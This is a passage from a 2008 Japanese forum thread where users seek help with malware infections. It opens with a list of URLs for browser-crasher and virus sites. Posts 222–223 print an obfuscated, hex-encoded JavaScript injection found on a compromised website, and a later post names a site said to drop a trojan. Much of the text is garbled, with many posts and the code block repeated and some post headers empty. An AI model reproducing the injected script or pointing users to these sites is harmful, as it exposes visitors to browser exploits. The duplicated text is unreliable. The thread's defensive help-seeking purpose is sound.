3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
220 :名無しさん@お腹いっぱい。:2008/12/13(土) 23:36:03
221 :名無しさん@お腹いっぱい。:2008/12/14(日) 01:19:47
スレチなら誘導お願いします。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。
222 :名無しさん@お腹いっぱい。:2008/12/14(日) 01:22:42
<script>function c102916999516m49435c6be9d24(m49435c6bea4f4)
{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}
{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}
223 :名無しさん@お腹いっぱい。:2008/12/14(日) 01:23:42
var zc6='';var
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>
224 :名無しさん@お腹いっぱい。:2008/12/14(日) 04:57:20
>>221-223
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。
以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
ttp://vil.nai.com/vil/default.aspx
Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script
詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。
あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。
以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
ttp://vil.nai.com/vil/default.aspx
Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script
詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。
あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。
225 :名無しさん@お腹いっぱい。:2008/12/14(日) 12:09:03
単純にIDとパスが漏れてる(推測しやすいとか、トロイ踏んだとか)とかね。
226 :名無しさん@お腹いっぱい。:2008/12/14(日) 20:48:41
【使用OS】 「windowsXP」
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」
PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです
どのような対策をすればよろしいのでしょうか?
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」
PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです
どのような対策をすればよろしいのでしょうか?
>>224
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。
>>225
感染ばっかり考えてて忘れてました。すぐ変更してみます。
ありがとうございました。
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。
>>225
感染ばっかり考えてて忘れてました。すぐ変更してみます。
ありがとうございました。
228 : ◆N9P3SuvBPo :2008/12/15(月) 18:19:19
>227
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?
とりあえずあちらの方の指示を優先してください。
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?
とりあえずあちらの方の指示を優先してください。
229 :名無しさん@お腹いっぱい。:2008/12/15(月) 18:55:49
>>211
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。
もし出来なかったらウイルスが実行されてる状態。
しかも各社ウイルス対策ソフトで全く対策されていないウイルス
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。
もし出来なかったらウイルスが実行されてる状態。
しかも各社ウイルス対策ソフトで全く対策されていないウイルス
>>228
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。
ありがとうございます。指示を待ちます。
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。
ありがとうございます。指示を待ちます。
231 :名無しさん@お腹いっぱい。:2008/12/15(月) 20:45:22
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」
avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」
avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?
232 :名無しさん@お腹いっぱい。:2008/12/15(月) 20:54:04
233 :名無しさん@お腹いっぱい。:2008/12/15(月) 21:07:59
234 :名無しさん@お腹いっぱい。:2008/12/15(月) 21:17:42
別スレに書き込んだのですが今皆さん何か問題が起きてるようで
スルーされ気味なのでこちらに書き込ませてください
OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか
スルーされ気味なのでこちらに書き込ませてください
OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか
235 :名無しさん@お腹いっぱい。:2008/12/15(月) 21:22:01
avastが検知した物はavastユーザにしかわかりませんので
avastスレにお帰りください
avastスレにお帰りください
236 :名無しさん@お腹いっぱい。:2008/12/17(水) 21:18:06
ウィルスが見つかりましたっていう警告が出たので
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています
確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?
マジ不安です
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています
確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?
マジ不安です
237 :名無しさん@お腹いっぱい。:2008/12/17(水) 21:30:47
>>236
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!
238 :名無しさん@お腹いっぱい。:2008/12/17(水) 21:34:56
バスタースレでどうぞ!
239 :名無しさん@お腹いっぱい。:2008/12/18(木) 22:05:26
【使用OS】 「XP sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
下記のメッセージが出て、インターネットの接続が切断されます。
処理の結果:ウィルス感染ファイルを隔離できませんでした。
このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE
対策等教えて頂ければ幸いです。
宜しくお願いします。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
下記のメッセージが出て、インターネットの接続が切断されます。
処理の結果:ウィルス感染ファイルを隔離できませんでした。
このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE
対策等教えて頂ければ幸いです。
宜しくお願いします。
240 :名無しさん@お腹いっぱい。:2008/12/18(木) 22:50:01
>>239
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。
241 :名無しさん@お腹いっぱい。:2008/12/19(金) 11:20:07
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1321330513
↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1321330513
↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。
242 :名無しさん@お腹いっぱい。:2008/12/19(金) 12:43:31
243 :名無しさん@お腹いっぱい。:2008/12/19(金) 21:40:56
>>239
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_LOLYDA.AE&VSect=Sn
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_LOLYDA.AE&VSect=Sn
244 :名無しさん@お腹いっぱい。:2008/12/19(金) 21:42:05
ネットにつながっていないPCのウィルスを除去したいのですが、なにかフリーでありませんでしょうか?
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし
245 :名無しさん@お腹いっぱい。:2008/12/19(金) 23:30:43
246 :名無しさん@お腹いっぱい。:2008/12/20(土) 05:46:34
>>241
システムの復元を無効にする
ttp://www.mcafee.com/Japan/mcafee/support/faq/answer_f_other.asp?wk=OT-00019
フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず
システムの復元を無効にする
ttp://www.mcafee.com/Japan/mcafee/support/faq/answer_f_other.asp?wk=OT-00019
フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず
247 :名無しさん@お腹いっぱい。:2008/12/20(土) 19:47:45
>>245
ありがとうございました。
ありがとうございました。
249 :名無しさん@お腹いっぱい。:2008/12/22(月) 19:38:14
250 :名無しさん@お腹いっぱい。:2008/12/22(月) 21:14:38
>>249
rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。
rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。
251 :名無しさん@お腹いっぱい。:2008/12/22(月) 22:02:25
逆汗するならともかくツール2〜3個拾うだけならプロとは言わんよ
252 :名無しさん@お腹いっぱい。:2008/12/22(月) 22:27:34
253 :名無しさん@お腹いっぱい。:2008/12/22(月) 23:32:30
a
254 :名無しさん@お腹いっぱい。:2008/12/22(月) 23:46:21
本日カスペルスキーでスキャンしろと
全社員に通達がありました。
なぜですか?
255 :名無しさん@お腹いっぱい。:2008/12/23(火) 00:03:57
そりゃ困った社員がウイルス付きPCをLANに繋いだからだろ
256 :名無しさん@お腹いっぱい。:2008/12/23(火) 00:26:34
【使用OS】WinXP Home edition Version2002 Service Pack3
【Microsoft Update(MU)の状態】被害が出てからupdate
【ルータの有無】 有
【スキャンの結果何が検出されたか】
トロイの木馬(トロジャンなんたら)とスパイウィア
処理第1段階
おとといの夜8時頃からずっとシャットダウンの繰り返し。
カウントダウン→シャットダウン(DCOM Processer Luncherが異常でなんたら)
昨夜は途中、デスクトップにあるIEなどのボタンをダブルクリックしても反応せず。
ウイルスバスター無料版2009をダウンロードしたが、削除はしてくれない。
ありました、というだけのよう。
カスペをダウンロード。
ウィルスバスターの中にウィルスがあると教えてくれる。削除。
そしてネットに繋がらないようになる。
【Microsoft Update(MU)の状態】被害が出てからupdate
【ルータの有無】 有
【スキャンの結果何が検出されたか】
トロイの木馬(トロジャンなんたら)とスパイウィア
処理第1段階
おとといの夜8時頃からずっとシャットダウンの繰り返し。
カウントダウン→シャットダウン(DCOM Processer Luncherが異常でなんたら)
昨夜は途中、デスクトップにあるIEなどのボタンをダブルクリックしても反応せず。
ウイルスバスター無料版2009をダウンロードしたが、削除はしてくれない。
ありました、というだけのよう。
カスペをダウンロード。
ウィルスバスターの中にウィルスがあると教えてくれる。削除。
そしてネットに繋がらないようになる。
257 :名無しさん@お腹いっぱい。:2008/12/23(火) 00:30:41
第2段階
もう一台のパソコンでググル。
ようやくSasserという言葉を知り、マイクロソフトのHPで対策。
対策途中、シャットダウンされると、ブラウザのヒストリーが真っ白になる。
なので、さっきのページをもう一度検索する。(お気に入りに登録)
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
ここを見て対策したらネットに繋がった。
regeditのレジストリキーは同じものがなかった。ここでUpdate。
悪意のあるソフトウェアの削除ツール (KB890830)をダウンロード。
http://www.microsoft.com/downloads/details.aspx?familyid=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=ja
一部が削除できないと言われる。
市販ソフトで対応するよう書かれてあったので、ウイルスバスターオンラインスキャンを行う。
スパイウェアが見つかり、削除完了。
再起動してみるが、またカウントダウンシャットダウンの繰り返し。
第3段階
ブラウザ、ネットに繋がったり繋がらなかったり。
ようやくこのスレに辿り着き、カウントダウンを止める。
>>9のF-Secure オンラインスキャナを試そうとすると、ダウンロード完了後、
再起動。(何度やっても。)
今、シーマンテックオンライン検索中。
スパイウェアってこんなに取れないものなんでしょうか。
もう一台のパソコンでググル。
ようやくSasserという言葉を知り、マイクロソフトのHPで対策。
対策途中、シャットダウンされると、ブラウザのヒストリーが真っ白になる。
なので、さっきのページをもう一度検索する。(お気に入りに登録)
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
ここを見て対策したらネットに繋がった。
regeditのレジストリキーは同じものがなかった。ここでUpdate。
悪意のあるソフトウェアの削除ツール (KB890830)をダウンロード。
http://www.microsoft.com/downloads/details.aspx?familyid=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=ja
一部が削除できないと言われる。
市販ソフトで対応するよう書かれてあったので、ウイルスバスターオンラインスキャンを行う。
スパイウェアが見つかり、削除完了。
再起動してみるが、またカウントダウンシャットダウンの繰り返し。
第3段階
ブラウザ、ネットに繋がったり繋がらなかったり。
ようやくこのスレに辿り着き、カウントダウンを止める。
>>9のF-Secure オンラインスキャナを試そうとすると、ダウンロード完了後、
再起動。(何度やっても。)
今、シーマンテックオンライン検索中。
スパイウェアってこんなに取れないものなんでしょうか。
258 :名無しさん@お腹いっぱい。:2008/12/23(火) 00:39:23
削除したのに出ました。
Unix.Penguin に感染しています。
VBS.Freelink.B に感染しています。
Unix.Penguin に感染しています。
Macro.src に感染しています。
Unix.Penguin に感染しています。
VBS.Freelink.B に感染しています。
Unix.Penguin に感染しています。
Macro.src に感染しています。
259 : ◆N9P3SuvBPo :2008/12/23(火) 00:49:46
>252
俺なら回復コンソールから一掃する。
Rootkitですら回復コンソール上では起動しないから。
やっかいなモノ
>これには同意
>256-257
>ウイルスバスター無料版2009をダウンロードしたが
なるほど…
それまで対策ソフトは入れてなかったわけだな。
それに…
>【Microsoft Update(MU)の状態】被害が出てからupdate
感染後に慌ててしても後の祭り
俺はリカバリーを奨めます!
>258
それは2ch専ブラフォルダからの検出
問題なし
俺なら回復コンソールから一掃する。
Rootkitですら回復コンソール上では起動しないから。
やっかいなモノ
>これには同意
>256-257
>ウイルスバスター無料版2009をダウンロードしたが
なるほど…
それまで対策ソフトは入れてなかったわけだな。
それに…
>【Microsoft Update(MU)の状態】被害が出てからupdate
感染後に慌ててしても後の祭り
俺はリカバリーを奨めます!
>258
それは2ch専ブラフォルダからの検出
問題なし
260 :名無しさん@お腹いっぱい。:2008/12/23(火) 00:56:00
>>259
レスありがとうございます
なんでかファイアウォールが無効になってました
対策ソフトは入れてなかった
買おうかなと思ったけど、どれもこれも削除できないソフトなら
買うものがないなーと考え中
>それは2ch専ブラフォルダからの検出
結局見つけられなかったということですよね
とりあえず、今日もまた深夜まで食い込んだので寝ます
レスありがとうございます
なんでかファイアウォールが無効になってました
対策ソフトは入れてなかった
買おうかなと思ったけど、どれもこれも削除できないソフトなら
買うものがないなーと考え中
>それは2ch専ブラフォルダからの検出
結局見つけられなかったということですよね
とりあえず、今日もまた深夜まで食い込んだので寝ます
261 :名無しさん@お腹いっぱい。:2008/12/23(火) 02:34:12
>>260
OS等を含むソフトウエア(ブラウザやフラッシュ、etc...)のアップデートは悪意から守るために、
事前に行っておく必要があり、セキュリティーソフトは悪意を防ぐために使う物で、被害を最小限に抑
えるためにも必要。
できの良い悪意のあるソフトは、一見してPCが異常であることが判らないものもある。今回のように
起動しないとか異常終了するなど、すぐに判るのはラッキーだと考えるべき。標準のFWを無効にする
など当たり前で、セキュリティーシステムを止めたり、自身の存在を検出できなくする物もある。
何も対策してないPCで、マルウエアが暴れたら手の施しようが無くなる。度々リカバリーしたくない
のなら、サポートの有る有償のセキュリティーソフトを使うことをお勧めする。
OS等を含むソフトウエア(ブラウザやフラッシュ、etc...)のアップデートは悪意から守るために、
事前に行っておく必要があり、セキュリティーソフトは悪意を防ぐために使う物で、被害を最小限に抑
えるためにも必要。
できの良い悪意のあるソフトは、一見してPCが異常であることが判らないものもある。今回のように
起動しないとか異常終了するなど、すぐに判るのはラッキーだと考えるべき。標準のFWを無効にする
など当たり前で、セキュリティーシステムを止めたり、自身の存在を検出できなくする物もある。
何も対策してないPCで、マルウエアが暴れたら手の施しようが無くなる。度々リカバリーしたくない
のなら、サポートの有る有償のセキュリティーソフトを使うことをお勧めする。
262 :名無しさん@お腹いっぱい。:2008/12/23(火) 18:17:05
ADWBJC?なんたらのウイルスにより、インターネットアクセスできません。手動で削除してくれと書いてますが、どうすれば…わかる方いますか?
263 :名無しさん@お腹いっぱい。:2008/12/23(火) 19:38:09
264 :名無しさん@お腹いっぱい。:2008/12/23(火) 22:03:02
265 :名無しさん@お腹いっぱい。:2008/12/27(土) 09:41:43
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
パソコンが強制的に再起動させられたりしますか?
266 :名無しさん@お腹いっぱい。:2008/12/27(土) 09:46:58
211 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/27(土) 09:14:13
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
267 :名無しさん@お腹いっぱい。:2008/12/27(土) 20:22:58
すでに廃業しているコムスンの公式HPを閲覧すると
トロイの木馬を送り込まれるようです。
こんなサイト放置しているのは危険だと思うので
あえて挑戦できるPC環境の方は
確認して、所定の機関に通報してください。
【感染する疑いのあるサイト⇒】ttp://www.comsn.c o m
トロイの木馬を送り込まれるようです。
こんなサイト放置しているのは危険だと思うので
あえて挑戦できるPC環境の方は
確認して、所定の機関に通報してください。
